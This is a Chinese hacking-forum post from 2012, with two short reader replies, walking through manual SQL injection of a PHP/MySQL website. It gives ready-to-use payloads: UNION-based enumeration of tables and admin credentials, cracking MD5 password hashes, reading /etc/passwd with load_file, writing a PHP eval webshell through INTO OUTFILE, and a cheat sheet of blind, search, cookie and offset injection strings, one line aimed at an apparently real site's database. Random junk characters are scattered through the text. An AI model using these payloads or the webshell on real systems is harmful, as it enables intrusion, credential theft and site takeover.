标题: 手工注入拿下一站 [打印本页] 作者: admin 时间: 2012-9-23 14:47 标题: 手工注入拿下一站 我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~ ) o, X0 u6 C3 e0 y+ D- C5 r% a* P让我看看,既然人家开口了,我也不好拒绝,那就看看吧?9 p. b5 z& q" w0 y. r3 p! Z7 M
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。0 Z, e; G" ?9 |
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。) $ a e3 H' J1 {* m; l4 g1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)& C* F* h. c1 U( |! z
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:" _7 r& M, O, V4 ^+ T) O
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in* d1 a% M6 A, f+ h9 Q5 B
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入 9 X. K8 O7 y+ n% U6 r ! d; ], d" C$ z
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,7 \& K1 P( N( }$ n
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意+ p8 n) [8 q+ [, |0 `% b k% \
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息& Z$ w) \+ p0 G. ]6 E, ^9 t
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。$ V1 [! Q) B5 q* t
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,: ` X/ r/ w4 E3 D9 Y! M
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。 : c$ ?2 v" m6 N我就用的是第二个思路, 6 H, g9 u) e1 o% k提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- 5 r+ B7 m3 d! A5 H' F x1 M$ W6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段, - ~. _5 m! O" S" h提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1-- - x' v( e2 K* x7 O注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。 1 L: q& e0 M$ R0 m, r7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办???? & `2 J3 ]5 j2 L% k! T- m是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd..... : e! J0 j X- @& t% k4 M1 Z6 T6 `0 f( b提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 -- ( ]2 o% N* n5 s然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,! o% b6 d" q& f3 M& n) H
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限...... 1 k8 Y/ ] f0 S+ S/ `9 h& e下面是一些很普遍注入方式资料: " S) b/ V% e0 n% k4 } g, k7 B注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=': N2 v% Q: y- ^" Q$ d- n
拆半法 6 J4 T; h- Z% k. H6 Y% [$ V# n& n###################################### ; I2 x4 e3 p; d# S4 }and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 ) G( s p- t" jand exists (select * from admin)5 n9 ^& m( C$ F2 q8 @2 D
and exists(select id from admin)0 J; `- e9 S! _. i+ \4 ?- N
and exists(select id from admin where id=1): u/ C% v/ L8 z9 ]* @/ y
and exists(select id from admin where id>1) 7 M$ t; M: q! R' C
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 ' W. G; w- ~! @: z8 g
and exists (select username from admin) & n2 B0 t8 p! u. a; v/ t8 Yand exists (select password from admin) : W; k( ^" K9 g+ `) Q$ i# M1 Vand exists (select id from admin where len(username)<10 and id=1) ) r( ~0 h! s, o* s, T& Land exists (select id from admin where len(username)>5 and id=1)+ Y* w% u. s. W* W" ~2 D8 l; p
and exists (select id from admin where len(username)=6 and id=1)2 T i; z) t# P) G, w3 u! D
and exists (select id from admin where len(password)<10 and id=1)4 t: _( }6 Z8 [0 T3 e
and exists (select id from admin where len(password)>5 and id=1) : C Q5 A9 V0 Zand exists (select id from admin where len(password)=7 and id=1)9 t9 y5 F* }* H H8 q
and (select top 1 asc(mid(username,1,1)) from admin)=97 . w3 {) _( e. w' J返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。4 b1 D4 |: x! L& P' n% i
猜第二位把username,1,1改成username,2,1就可以了。: M# |: l; E, C8 s5 p l$ e7 A3 n: o- I
猜密码把username改成password就OK了$ B6 I( c6 _3 F- [9 d0 b
##################################################9 ~; y$ T( c% j5 B) u
搜索型注入 * ?1 z" y) u- `- ]9 `################################## # D0 a$ g; }5 B& z& E%' and 1=1 and '%'=', e6 r9 U- A3 r3 {; i9 k
%' and exists (select * from admin) and '%'='' d" |8 M- d3 b; w& J! O
%' and exists(select id from admin where id=1) and '%'='6 V* ^5 \ h+ X7 J! z4 `$ M3 x2 ~
%' and exists (select id from admin where len(username)<10 and id=1) and '%'=' $ N7 C6 J4 U- c, N%' and exists (select id from admin where len(password)=7 and id=1) and '%'='0 i/ ?. H5 _; S0 v. b" z
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'=', ~7 T: I+ n- W
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'=' * v" I+ |8 G2 e1 O% C$ J2 `( `对于MSSQL数据库,后面可以吧 and '%'='换成-- 4 L) O! G' ~9 D; \还有一点搜索型注入也可以使用union语句。 5 x2 P) c. M" C3 b* D6 ~######################################################## + z8 Q7 m" _8 f' R% b/ ]" _1 X# c联合查询。 ' o' j) c) p" x- b#####################################: j+ q1 @# j/ b) ?
order by 105 W* Q; Y+ _0 y7 p( a
and 1=2 union select 1,2,3,4,5,6,7,8,9,10" A+ Y# v3 S- K% o: o
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin' Z- ^. g B5 v8 S- P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=12 o M2 y( @1 C# \) a/ ^; ?
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!) 2 y" m0 n* s2 b( M3 a$ F3 d8 L b###################################* Z d8 h+ V6 W) U; o' M
cookie注入6 r4 t: o- r- V0 t b! J
############################### / w5 q. ? U. l4 X& p6 L/ mhttp://www.******.com/shownews.asp?id=1277 S1 P& d0 H* @* v6 j
http://www.******.com/shownews.asp8 H" l4 g% K( x0 U8 z1 V
alert(="id="+escape("127"));* z# V) ?3 N2 p0 [2 |+ k
alert(="id="+escape("127 and 1=1")); & C: c& I. J7 ?' a& j6 Kalert(="id="+escape("127 order by 10")); * E/ T9 ^- b$ O! Talert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); ; A: H. d5 S5 ]+ Qalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1")); ' t. u% A0 {6 u# _# y7 O4 n7 v6 {这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。5 a& @" X, W9 s2 ~( n+ s
################################### ; J z8 l9 C* {, R5 ]偏移注入 % b" {" i# W3 b; I###########################################################, U% j" k# p) l( p6 D. F( e, _# ]5 P
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin * q2 c4 Q: i0 o' H n9 i: ounion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin' _! _3 |) ~4 I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)& v) g7 b+ _# d9 o. V# i
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id) ! ^: V7 r9 M1 D3 bunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) * _. }' I7 j: b6 V/ j" Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)8 [2 n4 A' \& Q6 C" Y4 k
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on) h, \' }/ g' ]3 j( d
a.id=d.id). G3 `7 V' t! g v( U
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id) ( \# ^- n6 ~- z0 T0 cand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 2 j: p* W/ s0 Y2 r. [. b: ]0 ~
4 H" ^4 R9 P; h============================================================================================================ 8 [0 H3 c# h4 J. i1.判断版本* }2 {6 W8 z3 I3 J# n# N. y
and ord(mid(version(),1,1))>51" Y: @1 r6 y; B. m# P$ l+ Y
返回正常,说明大于4.0版本,支持ounion查询 7 s0 h0 P1 D& Y2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解; n2 ?7 M: L4 l3 r; G0 _8 R
and 2=4 union select 1,2,3,4,5,6,7,8,9-- - w( f D# x3 ^" g# J3.查看数据库版本及当前用户,- a* u$ x8 c- D5 X/ h2 y1 N
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--. `& L4 z: H8 ~/ H) |
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,/ X3 `4 O: p; z8 `
4.判断有没有写权限2 b7 C" U w1 I4 g
and (select count(*) from MySQL.user)>0-- 1 V1 o8 w' U' U
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,14 J! {% w: n7 x
用不了这个命令,就学习土耳其黑客手法,如下 : [2 r" i- G* e) a! r: w9 xand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns-- 5 M* Y: f9 Q2 k9 t2 N6.爆表,爆库: ?6 f3 W& L# L3 Q+ A' v4 \
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--; I8 m( i! \% n- L* S
7.爆列名,爆表 4 C# e' @- h- s. p' B0 ^and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973-- D+ T2 [* E% P, L# Y5 R8.查询字段数,直接用limit N,1去查询,直接N到报错为止。 * ]& v- p2 C1 H. g5 }% g' Zand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys-- [5 p1 B) J% V0 i) Z7 \7 c
9.爆字段内容 2 @8 y8 k/ C0 P2 M5 \and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--' @8 V' [, x% x, \, d6 R http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--作者: xiancda 时间: 2012-9-24 21:40
非常好的归纳。坐下慢慢看~作者: wuyu 时间: 2012-9-25 18:53
谢谢分享,学习思路啊